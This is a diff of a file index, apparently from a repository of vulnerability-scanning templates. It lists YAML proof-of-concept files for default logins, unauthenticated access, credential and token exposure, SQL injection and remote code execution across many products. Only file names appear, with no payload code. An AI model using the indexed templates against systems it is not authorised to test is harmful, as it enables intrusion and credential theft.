./poc/atlassian/jira-unauthenticated-installed-gadgets-8329.yaml +./poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml ./poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml ./poc/atlassian/jira-unauthenticated-popular-filters.yaml ./poc/atlassian/jira-unauthenticated-projectcategories-8333.yaml ./poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml -./poc/atlassian/jira-unauthenticated-projects-8335.yaml +./poc/atlassian/jira-unauthenticated-projectcategories.yaml ./poc/atlassian/jira-unauthenticated-projects-8336.yaml +./poc/atlassian/jira-unauthenticated-projects.yaml ./poc/atlassian/jira-unauthenticated-resolutions-8337.yaml ./poc/atlassian/jira-unauthenticated-screens-8338.yaml ./poc/atlassian/jira-unauthenticated-screens-8339.yaml ./poc/atlassian/jira-unauthenticated-user-picker-8340.yaml -./poc/atlassian/jira-unauthenticated-user-picker-8341.yaml -./poc/atlassian/jira-unauthenticated-user-picker.yaml ./poc/atlassian/jira-unauthenticated.yaml ./poc/atlassian/jira-workflow.yaml +./poc/atlassian/jira_user_piker.yaml ./poc/atlassian/jirausername.yaml ./poc/atlassian/poc-yaml-Confluence-ognl-rce.yaml ./poc/auth/1password-phish.yaml @@ -1184,6 +1172,7 @@ ./poc/auth/Discuz-unauthorized-tools.yaml ./poc/auth/DocCMS-keyword-SQL.yaml ./poc/auth/DocCMS-keyword-sqli.yaml +./poc/auth/Dynatrace-token (copy 1).yaml ./poc/auth/Dynatrace-token.yaml ./poc/auth/EOffice_UserSelect_unauth.yaml ./poc/auth/E_cology-sqli-login.yaml @@ -1285,13 +1274,13 @@ ./poc/auth/accredible-certificates-19877bfd228a784355caff7bdef8ce37.yaml ./poc/auth/accredible-certificates.yaml ./poc/auth/acemanager-login-23.yaml +./poc/auth/acemanager-login-24.yaml ./poc/auth/acemanager-login-25.yaml ./poc/auth/acemanager-login.yaml ./poc/auth/activemq-default-login-44.yaml ./poc/auth/activemq-default-login-45.yaml -./poc/auth/activemq-default-login-47.yaml +./poc/auth/activemq-default-login-46.yaml ./poc/auth/activemq-default-login-48.yaml -./poc/auth/activemq-default-login.yaml ./poc/auth/activemq-default-password.yaml ./poc/auth/activemq-default-password.yml ./poc/auth/acumbamail-signup-forms-800304421471470ce44a3c0fd0b43721.yaml @@ -1323,6 +1312,7 @@ ./poc/auth/adobe-component-login-1.yaml ./poc/auth/adobe-component-login-2.yaml ./poc/auth/adobe-component-login-89.yaml +./poc/auth/adobe-component-login-91.yaml ./poc/auth/adobe-component-login-92.yaml ./poc/auth/adobe-component-login.yaml ./poc/auth/adobe-connect-central-login-94.yaml @@ -1336,31 +1326,31 @@ ./poc/auth/adobe-experience-manager-login-109.yaml ./poc/auth/adobe-experience-manager-login.yaml ./poc/auth/adobe-secret.yaml -./poc/auth/aem-default-login-140.yaml ./poc/auth/aem-default-login-141.yaml ./poc/auth/aem-default-login-142.yaml +./poc/auth/aem-default-login.yaml ./poc/auth/aem-login-status-167.yaml ./poc/auth/aem-login-status-168.yaml -./poc/auth/aem-login-status-169.yaml ./poc/auth/aem-login-status-170.yaml ./poc/auth/aem-login-status-171.yaml +./poc/auth/aem-secrets.yaml ./poc/auth/aem-sling-login.yaml ./poc/auth/afterlogic-webmail-login.yaml ./poc/auth/age-identity-secret-key.yaml ./poc/auth/age-recipient-public-key.yaml ./poc/auth/aic-intelligent-campus-system-password-leak.yaml ./poc/auth/aic-intelligent-password-leak.yaml +./poc/auth/aims-password-mgmt-client-218.yaml +./poc/auth/aims-password-mgmt-client-219.yaml ./poc/auth/aims-password-mgmt-client-220.yaml -./poc/auth/aims-password-mgmt-client-221.yaml ./poc/auth/aims-password-mgmt-client.yaml +./poc/auth/aims-password-portal-222.yaml ./poc/auth/aims-password-portal-223.yaml -./poc/auth/aims-password-portal-224.yaml ./poc/auth/aims-password-portal.yaml ./poc/auth/aircube-login.yaml ./poc/auth/airflow-default-credentials.yaml -./poc/auth/airflow-default-login-234.yaml ./poc/auth/airflow-default-login-235.yaml -./poc/auth/airflow-default-login.yaml +./poc/auth/airflow-default-login-236.yaml ./poc/auth/airflow-unauth.yaml ./poc/auth/airflow-unauth.yml ./poc/auth/airtable-key.yaml @@ -1372,12 +1362,13 @@ ./poc/auth/alibaba-canal-default-password.yaml ./poc/auth/alibaba-canal-default-password.yml ./poc/auth/alibaba-key-id.yaml +./poc/auth/alibaba-mongoshake-unauth-268.yaml ./poc/auth/alibaba-mongoshake-unauth-269.yaml ./poc/auth/alibaba-mongoshake-unauth-270.yaml ./poc/auth/alibaba-nacos-v1-auth-bypass.yml ./poc/auth/alibaba-secret-id.yaml +./poc/auth/alphaweb-default-login-275.yaml ./poc/auth/alphaweb-default-login-276.yaml -./poc/auth/alphaweb-default-login-277.yaml ./poc/auth/alphaweb-default-login.yaml ./poc/auth/amazon-accesskey-bypass.yaml ./poc/auth/amazon-mws-auth-token-11845.yaml @@ -1386,7 +1377,6 @@ ./poc/auth/amazon-mws-auth-token-283.yaml ./poc/auth/amazon-mws-auth-token-detect.yaml ./poc/auth/amazon-mws-auth-token.yaml -./poc/auth/amazon-mws-auth-token_重复副本.yaml ./poc/auth/amazon-session-token.yaml ./poc/auth/amazon-sns-token.yaml ./poc/auth/ambari-default-credentials-286.yaml @@ -1394,13 +1384,14 @@ ./poc/auth/ambari-default-login-288.yaml ./poc/auth/ambari-default-login-289.yaml ./poc/auth/ambari-default-login-290.yaml +./poc/auth/ambari-default-login.yaml ./poc/auth/ambari-default-password.yaml -./poc/auth/amcrest-login-297.yaml +./poc/auth/amcrest-login-296.yaml ./poc/auth/amcrest-login-298.yaml ./poc/auth/amcrest-login-299.yaml ./poc/auth/amcrest-login.yaml -./poc/auth/ametys-admin-login-300.yaml ./poc/auth/ametys-admin-login-301.yaml +./poc/auth/ametys-admin-login-302.yaml ./poc/auth/ametys-admin-login.yaml ./poc/auth/anaqua-login-panel.yaml ./poc/auth/aodun-sichuan-login-rce.yaml @@ -1413,6 +1404,7 @@ ./poc/auth/apache-flink-unauth-rce-355.yaml ./poc/auth/apache-flink-unauth-rce-356.yaml ./poc/auth/apache-flink-unauth-rce-357.yaml +./poc/auth/apache-flink-unauth-rce-358.yaml ./poc/auth/apache-flink-unauth-rce-359.yaml ./poc/auth/apache-hbase-unauth.yaml ./poc/auth/apache-kylin-unauth-cve-2020-13937.yml @@ -1421,19 +1413,20 @@ ./poc/auth/apache-storm-unauthorized-access.yml ./poc/auth/apache-superset-login-extended.yaml ./poc/auth/apache-tomcat-snoop-cookie-handling.yaml -./poc/auth/apc-ups-login-381.yaml -./poc/auth/apc-ups-login.yaml +./poc/auth/apc-ups-login-382.yaml ./poc/auth/api-bearer-auth-a2f3021256bf5d76bbaeaff6f05d43fd.yaml ./poc/auth/api-bearer-auth.yaml ./poc/auth/api-fortitoken-cloud.yaml ./poc/auth/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml ./poc/auth/api-key-for-google-maps.yaml ./poc/auth/api-keys.yaml -./poc/auth/api-mojoauth-466.yaml -./poc/auth/api-onelogin-472.yaml +./poc/auth/api-mojoauth.yaml +./poc/auth/api-onelogin.yaml ./poc/auth/apisix-default-login-490.yaml ./poc/auth/apisix-default-login-492.yaml ./poc/auth/apollo-default-login-520.yaml +./poc/auth/apollo-default-login-521.yaml +./poc/auth/apple-app-site-association-524.yaml ./poc/auth/apple-app-site-association-525.yaml ./poc/auth/apple-app-site-association-526.yaml ./poc/auth/apple-app-site-association.yaml @@ -1442,9 +1435,9 @@ ./poc/auth/argocd-login-534.yaml ./poc/auth/argocd-login-535.yaml ./poc/auth/argocd-login-536.yaml -./poc/auth/arl-default-login-537.yaml ./poc/auth/arl-default-login-538.yaml ./poc/auth/arl-default-login-539.yaml +./poc/auth/arl-default-login-540.yaml ./poc/auth/arl-default-login.yaml ./poc/auth/arl-default-password-542.yaml ./poc/auth/arl-default-password.yaml @@ -1457,8 +1450,8 @@ ./poc/auth/atlassian-bitbucket-loginbypass.yaml ./poc/auth/atlassian-login-check.yaml ./poc/auth/atlassian-login-default.yaml -./poc/auth/atvise-login-589.yaml ./poc/auth/atvise-login-590.yaml +./poc/auth/atvise-login-591.yaml ./poc/auth/auth token leake.yaml ./poc/auth/auth-header-manipulation.yaml ./poc/auth/auth-js.yaml @@ -1507,21 +1500,23 @@ ./poc/auth/auto-login-new-user-after-registration.yaml ./poc/auth/auto-login-when-resister-2f930912217edb47a1b0335c7c11b347.yaml ./poc/auth/auto-login-when-resister.yaml -./poc/auth/avatier-password-management-605.yaml +./poc/auth/avatier-password-management-604.yaml ./poc/auth/avatier_password_management.yaml +./poc/auth/avatier_password_management.yml ./poc/auth/avtech-password-disclosure.yaml +./poc/auth/aws-access-key-value-621.yaml ./poc/auth/aws-access-key-value-622.yaml ./poc/auth/aws-access-key-value-623.yaml ./poc/auth/aws-access-key-value-625.yaml ./poc/auth/aws-access-key-value.yaml ./poc/auth/aws-access-key.yaml -./poc/auth/aws-opensearch-login-649.yaml +./poc/auth/aws-opensearch-login-650.yaml ./poc/auth/aws-opensearch-login.yaml ./poc/auth/aws-secrets.yaml ./poc/auth/axiom-digitalocean-key-exposure-665.yaml ./poc/auth/axiom-digitalocean-key-exposure-666.yaml ./poc/auth/axiom-digitalocean-key-exposure-667.yaml -./poc/auth/axiom-digitalocean-key-exposure.yaml +./poc/auth/axiom-digitalocean-key-exposure-668.yaml ./poc/auth/axis2-default-login-1.yaml ./poc/auth/axis2-default-login-2.yaml ./poc/auth/axis2-default-login.yaml @@ -1531,10 +1526,11 @@ ./poc/auth/axublog-adlogin-sql-injection.yaml ./poc/auth/axublog-login-universal-password.yaml ./poc/auth/axublog-v1-cookiebypass.yaml -./poc/auth/azkaban-default-login-671.yaml ./poc/auth/azkaban-default-login-672.yaml ./poc/auth/azkaban-default-login-673.yaml +./poc/auth/azkaban-default-login-674.yaml ./poc/auth/azkaban-default-login-675.yaml +./poc/auth/azkaban-default-login.yaml ./poc/auth/azkaban-default-password.yaml ./poc/auth/azkaban-web-client-default-creds.yaml ./poc/auth/azure-apim-secret-key-disclosure.yaml @@ -1549,7 +1545,6 @@ ./poc/auth/baw-login-logout-menu.yaml ./poc/auth/bazarr-login-700.yaml ./poc/auth/bazarr-login-701.yaml -./poc/auth/bazarr-login-702.yaml ./poc/auth/bazarr-login.yaml ./poc/auth/bbpress-login-register-links-on-forum-topic-pages-0c04f03046971ace3308f75f8502712f.yaml ./poc/auth/bbpress-login-register-links-on-forum-topic-pages-4cedc7b2a0c00a81096cf3fcc283b780.yaml @@ -1573,7 +1568,7 @@ ./poc/auth/beescms_v3-login-sql-injection.yaml ./poc/auth/beescms_v4-login-sqli.yaml ./poc/auth/behavioral-auth-bypass.yaml -./poc/auth/beyondtrust-login-server-719.yaml +./poc/auth/beyondtrust-login-server-718.yaml ./poc/auth/beyondtrust-login-server.yaml ./poc/auth/bigant-login-panel.yaml ./poc/auth/bigbluebutton-login-724.yaml @@ -1604,17 +1599,18 @@ ./poc/auth/blossom-spa.yaml ./poc/auth/blossomthemes-email-newsletter-7dc6edac570bf028c64b4de6d220672b.yaml ./poc/auth/blossomthemes-email-newsletter.yaml +./poc/auth/blue-iris-login-751.yaml ./poc/auth/blue-iris-login-752.yaml ./poc/auth/blue-iris-login-753.yaml -./poc/auth/blue-iris-login-754.yaml ./poc/auth/blue-iris-login.yaml ./poc/auth/bluet-keywords-tooltip-generator-71ffb92be6862dd3422bd8a61ad3a3ae.yaml ./poc/auth/bluet-keywords-tooltip-generator-9f8dfb534ce422b5a9c6344470f1b6e5.yaml ./poc/auth/bluet-keywords-tooltip-generator.yaml ./poc/auth/bohuawanglong-users-xml-password-leak.yaml ./poc/auth/bomgar-login-panel.yaml +./poc/auth/braintree-access-token-771.yaml ./poc/auth/braintree-access-token-772.yaml -./poc/auth/braintree-access-token-773.yaml +./poc/auth/braintree-access-token.yaml ./poc/auth/branch-key-774.yaml ./poc/auth/branch-key.yaml ./poc/auth/brother-unauthorized-access-791.yaml @@ -1628,7 +1624,6 @@ ./poc/auth/businessintelligence-default-login-814.yaml ./poc/auth/businessintelligence-default-login-815.yaml ./poc/auth/businessintelligence-default-login-816.yaml -./poc/auth/businessintelligence-default-login.yaml ./poc/auth/camunda-login-panel-1.yaml ./poc/auth/camunda-login-panel-2.yaml ./poc/auth/camunda-login-panel.yaml @@ -1679,9 +1674,9 @@ ./poc/auth/check-register_argc_argv.yaml ./poc/auth/checkmk-login.yaml ./poc/auth/chefio-login-check.yaml -./poc/auth/chinaunicom-default-login-906.yaml ./poc/auth/chinaunicom-default-login-907.yaml ./poc/auth/chinaunicom-default-login-908.yaml +./poc/auth/chinaunicom-default-login-909.yaml ./poc/auth/chinaunicom-modem-default-credentials-911.yaml ./poc/auth/chinaunicom-modem-default-credentials.yaml ./poc/auth/chinaunicom-modem-default-password.yaml @@ -1694,8 +1689,8 @@ ./poc/auth/cisco-integrated-login-941.yaml ./poc/auth/cisco-integrated-login-942.yaml ./poc/auth/cisco-integrated-login.yaml +./poc/auth/cisco-systems-login-973.yaml ./poc/auth/cisco-systems-login-974.yaml -./poc/auth/cisco-systems-login-975.yaml ./poc/auth/cisco-systems-login.yaml ./poc/auth/cisco-ucs-kvm-login-980.yaml ./poc/auth/cisco-ucs-kvm-login.yaml @@ -1719,6 +1714,7 @@ ./poc/auth/clickhouse-api-unauth.yaml ./poc/auth/clickhouse-db-unauth.yaml ./poc/auth/clickhouse-server-Unauthorized-Sql.yaml +./poc/auth/clickhouse-unauth-1002.yaml ./poc/auth/clickhouse-unauth-1003.yaml ./poc/auth/clickhouse-unauth-1004.yaml ./poc/auth/clickhouse-unauth-api.yaml @@ -1742,25 +1738,27 @@ ./poc/auth/co-authors-plus-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/co-authors-plus-plugin.yaml ./poc/auth/co-authors-plus.yaml -./poc/auth/cobbler-default-login-1118.yaml +./poc/auth/cobbler-default-login-1119.yaml ./poc/auth/cobbler-default-login-1120.yaml ./poc/auth/cobbler-default-login-1121.yaml +./poc/auth/cobbler-default-login.yaml ./poc/auth/code-climate-token.yaml ./poc/auth/code-server-login.yaml ./poc/auth/codecov-access-token.yaml ./poc/auth/codepen-login-check.yaml -./poc/auth/codian-mcu-login-1139.yaml -./poc/auth/codian-mcu-login.yaml +./poc/auth/codian-mcu-login-1140.yaml ./poc/auth/coinbase-access-token.yaml +./poc/auth/coldfusion-administrator-login-1143.yaml ./poc/auth/coldfusion-administrator-login-1144.yaml +./poc/auth/coldfusion-administrator-login-1145.yaml ./poc/auth/coldfusion-administrator-login-1146.yaml -./poc/auth/coldfusion-administrator-login-1147.yaml ./poc/auth/coldfusion-administrator-login.yaml ./poc/auth/coldfusion-lucee-auth-bypass.yaml ./poc/auth/commax-biometric-auth-bypass-1156.yaml ./poc/auth/commax-biometric-auth-bypass.yaml ./poc/auth/commax-credentials-disclosure-1158.yaml ./poc/auth/commax-credentials-disclosure-1159.yaml +./poc/auth/commax-credentials-disclosure-1160.yaml ./poc/auth/composer-auth-json.yaml ./poc/auth/comtrend-password-exposure-1166.yaml ./poc/auth/comtrend-password-exposure-1167.yaml @@ -1834,9 +1832,8 @@ ./poc/auth/couchdb-unauthorized.yaml ./poc/auth/cratesio-api-key.yaml ./poc/auth/creatio-login-panel.yaml -./poc/auth/credential-exposure-1249.yaml ./poc/auth/credential-exposure-1250.yaml -./poc/auth/credential-exposure-1251.yaml +./poc/auth/credential-exposure-file.yaml ./poc/auth/credential-exposure.yaml ./poc/auth/credentials (copy 1).yaml ./poc/auth/credentials-1258.yaml @@ -1844,9 +1841,9 @@ ./poc/auth/credentials-disclosure-1252.yaml ./poc/auth/credentials-disclosure-1253.yaml ./poc/auth/credentials-disclosure-1254.yaml +./poc/auth/credentials-disclosure-1255.yaml ./poc/auth/credentials-disclosure-1256.yaml ./poc/auth/credentials-disclosure-all.yaml -./poc/auth/credentials-disclosure.yaml ./poc/auth/credentials-json.yaml ./poc/auth/credentials.yaml ./poc/auth/credit-tracker-2fde541f2278766f1674a8e26eb35024.yaml @@ -1855,12 +1852,14 @@ ./poc/auth/credova-financial.yaml ./poc/auth/crush-ftp-login-1273.yaml ./poc/auth/crush-ftp-login-1274.yaml +./poc/auth/crush-ftp-login-1275.yaml ./poc/auth/crush-ftp-login.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1281.yaml +./poc/auth/cs-cart-unauthenticated-lfi-1282.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1283.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1284.yaml -./poc/auth/cs-cart-unauthenticated-lfi-1285.yaml ./poc/auth/cs141-default-login-1.yaml +./poc/auth/cs141-default-login-1277.yaml ./poc/auth/cs141-default-login-1278.yaml ./poc/auth/cs141-default-login-1279.yaml ./poc/auth/cs141-default-login-1280.yaml @@ -1907,7 +1906,7 @@ ./poc/auth/customize-login.yaml ./poc/auth/cx-cloud-login-1.yaml ./poc/auth/cx-cloud-login-2.yaml -./poc/auth/cx-cloud-login-6765.yaml +./poc/auth/cx-cloud-login-6764.yaml ./poc/auth/cx-cloud-login.yaml ./poc/auth/cyberus-key-0fcb55b4c15a72fb5f03d007d9eea213.yaml ./poc/auth/cyberus-key-516498bd644bd44412ee37a24de3895a.yaml @@ -1935,7 +1934,6 @@ ./poc/auth/dbeaver-credentials-6780.yaml ./poc/auth/dbeaver-credentials-6781.yaml ./poc/auth/dbeaver-credentials-6782.yaml -./poc/auth/dbeaver-credentials.yaml ./poc/auth/dell-emc-ecom-default-credentials-6917.yaml ./poc/auth/dell-emc-ecom-default-credentials.yaml ./poc/auth/dell-idrac-default-login-6942.yaml @@ -1947,13 +1945,11 @@ ./poc/auth/dell-idrac9-default-login-6932.yaml ./poc/auth/dell-idrac9-default-login-6933.yaml ./poc/auth/dell-idrac9-default-login-6934.yaml -./poc/auth/dell-idrac9-default-login-6935.yaml ./poc/auth/dell-idrac9-default-password.yaml ./poc/auth/dell-openmanager-login-1.yaml ./poc/auth/dell-openmanager-login-2.yaml ./poc/auth/dell-openmanager-login-6948.yaml ./poc/auth/dell-openmanager-login-6949.yaml -./poc/auth/dell-openmanager-login-6950.yaml ./poc/auth/dell-openmanager-login.yaml ./poc/auth/dell-remote-power-management-default-login.yaml ./poc/auth/dell-wyse-login-6953.yaml @@ -1963,7 +1959,6 @@ ./poc/auth/dell-wyse-management-suite-login-6956.yaml ./poc/auth/dell-wyse-management-suite-login.yaml ./poc/auth/delta-login-panel.yaml -./poc/auth/dericam-login-6960.yaml ./poc/auth/dericam-login-6961.yaml ./poc/auth/dericam-login-6962.yaml ./poc/auth/dericam-login.yaml @@ -1975,7 +1970,6 @@ ./poc/auth/dir-600-login-panel.yaml ./poc/auth/dir-850l-login-panel.yaml ./poc/auth/directadmin-login-panel-7000.yaml -./poc/auth/directadmin-login-panel-7001.yaml ./poc/auth/directadmin-login-panel.yaml ./poc/auth/directum-login.yaml ./poc/auth/disable-user-login-e081053d3461091ab36b623cc2522dea.yaml @@ -1984,7 +1978,7 @@ ./poc/auth/discord-cilent-secret.yaml ./poc/auth/discuz-wechat-plugins-unauth.yaml ./poc/auth/discuz-wechat-plugins-unauth.yml -./poc/auth/django-secret-key.yaml +./poc/auth/django-secret.key.yaml ./poc/auth/dlink-850l-password-leak.yaml ./poc/auth/dlink-ac-centralized-management-system-default-login.yaml ./poc/auth/dlink-ac-default-password.yaml @@ -2016,7 +2010,6 @@ ./poc/auth/druid-default-login-1.yaml ./poc/auth/druid-default-login-2.yaml ./poc/auth/druid-default-login-7095.yaml -./poc/auth/druid-default-login-7096.yaml ./poc/auth/druid-default-login-7097.yaml ./poc/auth/druid-default-login.yaml ./poc/auth/druid-default-password-1.yaml @@ -2044,15 +2037,13 @@ ./poc/auth/drupal_module-token_custom-arbitrary-php-code-execution.yaml ./poc/auth/drupal_module-yubikey-access-bypass.yaml ./poc/auth/dubbo-admin-default-login-7120.yaml -./poc/auth/dubbo-admin-default-login-7121.yaml ./poc/auth/dubbo-admin-default-password.yaml ./poc/auth/dubbo-admin-default-password.yml ./poc/auth/duffel-api-token.yaml ./poc/auth/dvwa-default-login-7126.yaml ./poc/auth/dvwa-default-login-7127.yaml -./poc/auth/dvwa-default-login-7129.yaml +./poc/auth/dvwa-default-login-7128.yaml ./poc/auth/dvwa-headless-automatic-login-7130.yaml -./poc/auth/dvwa-headless-automatic-login-7131.yaml ./poc/auth/dvwa-headless-automatic-login-7132.yaml ./poc/auth/dvwa-headless-automatic-login-7133.yaml ./poc/auth/dvwa-headless-automatic-login.yaml @@ -2122,8 +2113,8 @@ ./poc/auth/emqx-default-login-7221.yaml ./poc/auth/emqx-default-login-7222.yaml ./poc/auth/emqx-default-login.yaml -./poc/auth/ems-login-panel-7223.yaml ./poc/auth/ems-login-panel-7224.yaml +./poc/auth/ems-login-panel-7225.yaml ./poc/auth/ems-login-panel.yaml ./poc/auth/enable-s3-bucketkeys.yaml ./poc/auth/enable-secret-for-password-user-and-.yaml @@ -2132,6 +2123,7 @@ ./poc/auth/epmp-login-7229.yaml ./poc/auth/epmp-login-7230.yaml ./poc/auth/epmp-login-7231.yaml +./poc/auth/epmp-login-7232.yaml ./poc/auth/epson-unauthorized-access-detect.yaml ./poc/auth/erident-custom-login-and-dashboard-0e2a68c6bc5c7e524706a5b5493bef90.yaml ./poc/auth/erident-custom-login-and-dashboard-65d615ac22cc89343ec17e71c91783a6.yaml @@ -2146,6 +2138,7 @@ ./poc/auth/esafenet-cdgserver3-systemconfig-default-password.yaml ./poc/auth/esxi-unauthorized-access.yaml ./poc/auth/etcd-keys-7261.yaml +./poc/auth/etcd-keys-7262.yaml ./poc/auth/etcd-keys.yaml ./poc/auth/etcd-unauth.yaml ./poc/auth/etcd-unauth.yml @@ -2172,6 +2165,7 @@ ./poc/auth/exacqvision-default-login-7275.yaml ./poc/auth/exacqvision-default-login-7276.yaml ./poc/auth/exacqvision-default-login-7277.yaml +./poc/auth/exacqvision-default-login.yaml ./poc/auth/exacqvision-default-password.yaml ./poc/auth/exchange-addon-authorize-net-d43cc9eb0f6efba271859825f9179410.yaml ./poc/auth/exchange-addon-authorize-net.yaml @@ -2196,7 +2190,6 @@ ./poc/auth/fanwei-login-bypass.yaml ./poc/auth/faraday-login-7393.yaml ./poc/auth/faraday-login-7394.yaml -./poc/auth/faraday-login-7395.yaml ./poc/auth/faraday-login-7396.yaml ./poc/auth/faraday-login.yaml ./poc/auth/fastly-api-token.yaml @@ -2204,10 +2197,10 @@ ./poc/auth/fatpipe-auth-bypass-7432.yaml ./poc/auth/fb-access-token.yaml ./poc/auth/fcm-api-key.yaml +./poc/auth/fcm-server-key-7450.yaml ./poc/auth/fcm-server-key-7451.yaml ./poc/auth/fcm-server-key-7452.yaml ./poc/auth/fcm-server-key-7453.yaml -./poc/auth/fcm-server-key-7454.yaml ./poc/auth/fcm-server-key.yaml ./poc/auth/feather-login-page-0bc47f0828578a01035f4ac0c01bf787.yaml ./poc/auth/feather-login-page-291153fe25b5ab0269ede43db1b50194.yaml @@ -2234,7 +2227,6 @@ ./poc/auth/flir-ax8-default-credentials-7512.yaml ./poc/auth/flir-ax8-default-credentials.yaml ./poc/auth/flir-default-login-7513.yaml -./poc/auth/flir-default-login-7514.yaml ./poc/auth/flir-default-login-7515.yaml ./poc/auth/flir-default-login-7516.yaml ./poc/auth/fortiauthenticator-detect.yaml @@ -2246,12 +2238,14 @@ ./poc/auth/frp-default-login-7556.yaml ./poc/auth/frp-default-login-7557.yaml ./poc/auth/frp-default-login-7558.yaml +./poc/auth/frp-default-login-7559.yaml ./poc/auth/frp-unauthenticated.yaml ./poc/auth/ftp-anonymous-login.yaml ./poc/auth/ftp-credentials-exposure-7567.yaml -./poc/auth/ftp-credentials-exposure-7568.yaml +./poc/auth/ftp-credentials-exposure.yaml ./poc/auth/ftp-default-credentials.yaml ./poc/auth/ftp-weak-credentials-7569.yaml +./poc/auth/ftp-weak-credentials-7570.yaml ./poc/auth/ftp-weak-credentials.yaml ./poc/auth/fuelcms-default-login-7571.yaml ./poc/auth/fuelcms-default-login-7572.yaml @@ -2275,20 +2269,20 @@ ./poc/auth/general-tokens-7580.yaml ./poc/auth/general-tokens-7581.yaml ./poc/auth/general-tokens-7582.yaml -./poc/auth/general-tokens-7583.yaml ./poc/auth/general-tokens-7584.yaml ./poc/auth/general-tokens-7585.yaml ./poc/auth/general-tokens-7586.yaml ./poc/auth/general-tokens.yaml ./poc/auth/geoserver-default-login-7593.yaml -./poc/auth/geoserver-default-login-7594.yaml +./poc/auth/geoserver-default-login.yaml ./poc/auth/geoserver-login-panel.yaml ./poc/auth/get-access-token-json.yaml +./poc/auth/git-credentials-7643.yaml ./poc/auth/git-credentials-7644.yaml ./poc/auth/git-credentials-disclosure-7639.yaml -./poc/auth/git-credentials-disclosure-7640.yaml ./poc/auth/git-credentials-disclosure-7641.yaml ./poc/auth/git-credentials-disclosure-7642.yaml +./poc/auth/git-credentials-disclosure.yaml ./poc/auth/git-credentials.yaml ./poc/auth/gitea-login-7645.yaml ./poc/auth/gitea-login-check.yaml @@ -2304,43 +2298,38 @@ ./poc/auth/gitlab-login-panel.yaml ./poc/auth/gitlab-personal-accesstoken.yaml ./poc/auth/gitlab-pipeline-triggertoken.yaml +./poc/auth/gitlab-public-signup-7681.yaml ./poc/auth/gitlab-public-signup-7682.yaml -./poc/auth/gitlab-public-signup-7683.yaml ./poc/auth/gitlab-public-signup-7684.yaml ./poc/auth/gitlab-public-signup.yaml ./poc/auth/gitlab-runner-regtoken.yaml ./poc/auth/gitlab-uninitialized-password-7694.yaml ./poc/auth/gitlab-uninitialized-password-7695.yaml -./poc/auth/gitlab-uninitialized-password.yaml ./poc/auth/gitlab-weak-login-1.yaml ./poc/auth/gitlab-weak-login-2.yaml ./poc/auth/gitlab-weak-login-3.yaml ./poc/auth/gitlab-weak-login-4.yaml ./poc/auth/gitlab-weak-login-7704.yaml ./poc/auth/gitlab-weak-login-7705.yaml -./poc/auth/gitlab-weak-login-7706.yaml ./poc/auth/gitlab-weak-login-7707.yaml ./poc/auth/gitter-token.yaml ./poc/auth/gloo-unauth-7722.yaml ./poc/auth/gloo-unauth-7724.yaml -./poc/auth/gloo-unauth-7725.yaml ./poc/auth/gloo-unauth-7726.yaml ./poc/auth/gloo-unauth.yaml ./poc/auth/glpi-authentication-7728.yaml -./poc/auth/glpi-authentication-7729.yaml ./poc/auth/glpi-authentication-7730.yaml ./poc/auth/glpi-authentication.yaml ./poc/auth/glpi-default-credential.yaml ./poc/auth/glpi-default-login-7731.yaml ./poc/auth/glpi-default-login-7732.yaml ./poc/auth/glpi-default-login-7733.yaml -./poc/auth/glpi-default-login.yaml ./poc/auth/glpi-login-1.yaml ./poc/auth/glpi-login-2.yaml ./poc/auth/glpi-login-7736.yaml +./poc/auth/glpi-login-7737.yaml ./poc/auth/glpi-login.yaml ./poc/auth/gmail-api-client-secrets-7740.yaml -./poc/auth/gmail-api-client-secrets-7741.yaml ./poc/auth/gmail-api-client-secrets.yaml ./poc/auth/goanywhere-mft-login.yaml ./poc/auth/gocd-encryption-key-7750.yaml @@ -2372,6 +2361,7 @@ ./poc/auth/google-earth-dlogin-7778.yaml ./poc/auth/google-earth-dlogin-7779.yaml ./poc/auth/google-earth-dlogin-7780.yaml +./poc/auth/google-earth-dlogin-7781.yaml ./poc/auth/google-earth-dlogin-7782.yaml ./poc/auth/google-earthenterprise-weak-password.yaml ./poc/auth/google-oauth-clientsecret.yaml @@ -2384,6 +2374,7 @@ ./poc/auth/google-seo-author-snippets.yaml ./poc/auth/gophish-default-login-7792.yaml ./poc/auth/gophish-default-login-7793.yaml +./poc/auth/gophish-default-login-7794.yaml ./poc/auth/gophish-login-7795.yaml ./poc/auth/gophish-login.yaml ./poc/auth/grafana-api-key-exposure.yaml @@ -2403,15 +2394,15 @@ ./poc/auth/grafana-login.yml ./poc/auth/grafana-public-signup-7814.yaml ./poc/auth/grafana-public-signup-7815.yaml -./poc/auth/grafana-public-signup-7817.yaml +./poc/auth/grafana-public-signup-7816.yaml ./poc/auth/grafana-public-signup.yaml ./poc/auth/graphite-browser-default-credential.yaml ./poc/auth/grav-register-admin.yaml ./poc/auth/gryphon-login.yaml ./poc/auth/gt-ac2900-login.yaml ./poc/auth/guacamole-default-login-7858.yaml -./poc/auth/guacamole-default-login-7859.yaml ./poc/auth/guacamole-default-login-7860.yaml +./poc/auth/guacamole-default-login-7861.yaml ./poc/auth/guacamole-default-login.yaml ./poc/auth/guest-author-25a9f786708949ed3cefc36430f46236.yaml ./poc/auth/guest-author-4d34c897b6528aec62cddbdcf5112296.yaml @@ -2432,7 +2423,6 @@ ./poc/auth/hadoop-unauth-1.yaml ./poc/auth/hadoop-unauth-2.yaml ./poc/auth/hadoop-unauth-7875.yaml -./poc/auth/hadoop-unauth-7877.yaml ./poc/auth/hadoop-unauth.yaml ./poc/auth/hadoop-unauthenticated-access.yaml ./poc/auth/hadoop-yarn-unauth.yaml @@ -2454,9 +2444,9 @@ ./poc/auth/hikvision-intercom-service-default-password.yaml ./poc/auth/hikvision-intercom-service-default-password.yml ./poc/auth/hikvision-unauthenticated-rce-cve-2021-36260.yml -./poc/auth/hivemanager-login-panel-7963.yaml ./poc/auth/hivemanager-login-panel-7964.yaml ./poc/auth/hivemanager-login-panel-7965.yaml +./poc/auth/hivemanager-login-panel-7966.yaml ./poc/auth/hivemanager-login-panel.yaml ./poc/auth/homeworks-illumination-web-keypad.yaml ./poc/auth/hongdian-default-login-1.yaml @@ -2478,12 +2468,9 @@ ./poc/auth/hp-ilo-serial-key-disclosure-8022.yaml 